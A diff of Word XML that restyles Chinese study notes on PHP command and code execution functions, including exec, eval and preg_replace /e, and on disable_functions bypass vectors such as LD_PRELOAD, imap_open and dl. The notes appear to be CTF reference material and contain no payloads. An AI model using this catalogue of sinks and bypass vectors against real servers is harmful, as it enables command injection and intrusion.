     <w:p>
@@ -8054,18 +7760,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`exec()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>exec()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8137,18 +7836,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`shell_exec()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>shell_exec()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8187,22 +7879,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>全部输出</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>）</w:t>
+        <w:t>（全部输出）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8235,17 +7912,39 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`` `反引号` ``</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>反引号</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
         </w:rPr>
       </w:r>
     </w:p>
@@ -8318,18 +8017,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`passthru()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>passthru()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8341,22 +8033,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>直接回显：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>✅ 有</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>（原始二进制）</w:t>
+        <w:t>直接回显：✅ 有（原始二进制）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8409,18 +8086,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`popen()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>popen()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8508,18 +8178,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`proc_open()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>proc_open()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8599,18 +8262,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`pcntl_exec()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>pcntl_exec()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8622,15 +8278,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>直接回显：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>✅ 有</w:t>
+        <w:t>直接回显：✅ 有</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8676,7 +8324,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>实测输出对照：</w:t>
@@ -8939,25 +8586,17 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>要立刻看到结果</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`system`</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>要立刻看到结果：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>system</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8967,17 +8606,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>结果要处理/过滤</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>结果要处理/过滤：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9002,17 +8633,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>要多行数组</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>要多行数组：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9037,17 +8660,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>要退出码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>要退出码：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9095,17 +8710,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>要 stderr</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>要 stderr：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9123,17 +8730,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>双向交互</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>双向交互：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9166,17 +8765,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**无回显时</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>无回显时：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9230,18 +8821,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`eval()`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>eval()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9274,11 +8858,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`assert()`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>assert()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9302,15 +8886,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>版本限制：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>PHP 7.2+ 不再执行字符串</w:t>
+        <w:t>版本限制：PHP 7.2+ 不再执行字符串</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9319,11 +8895,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`create_function()`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>create_function()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9356,11 +8932,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`preg_replace(/e)`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>preg_replace(/e)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9384,15 +8960,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>版本限制：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>PHP 7 移除</w:t>
+        <w:t>版本限制：PHP 7 移除</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9401,11 +8969,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`call_user_func()` / `call_user_func_array()`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>call_user_func()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>call_user_func_array()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9438,11 +9021,41 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`array_map` / `array_filter` / `array_reduce`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>array_map</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>array_filter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>array_reduce</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9475,11 +9088,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`usort` / `uasort`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>usort</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>uasort</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9512,11 +9140,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`ob_start()`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ob_start()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9549,11 +9177,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`include` / `require`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>include</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>require</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9587,7 +9230,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>PHP 8 实测：</w:t>
@@ -9703,11 +9345,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`mail($to,$sub,$msg,$hdr,$param)`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>mail($to,$sub,$msg,$hdr,$param)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9731,11 +9373,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`putenv("LD_PRELOAD=...")`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>putenv("LD_PRELOAD=...")</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9751,11 +9393,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`imap_open($mailbox,...)`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>imap_open($mailbox,...)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9771,11 +9413,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`error_log($msg, 1, $to)`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>error_log($msg, 1, $to)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9814,11 +9456,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`mb_send_mail`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>mb_send_mail</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9842,11 +9484,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`pcntl_exec`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>pcntl_exec</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9877,11 +9519,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`dl()`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>dl()</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9897,11 +9539,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`ImageMagick` 的 `convert`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ImageMagick</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 的 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>convert</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9933,7 +9590,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>1</w:t>
@@ -9948,15 +9604,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>题型：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>命令注入-无过滤</w:t>
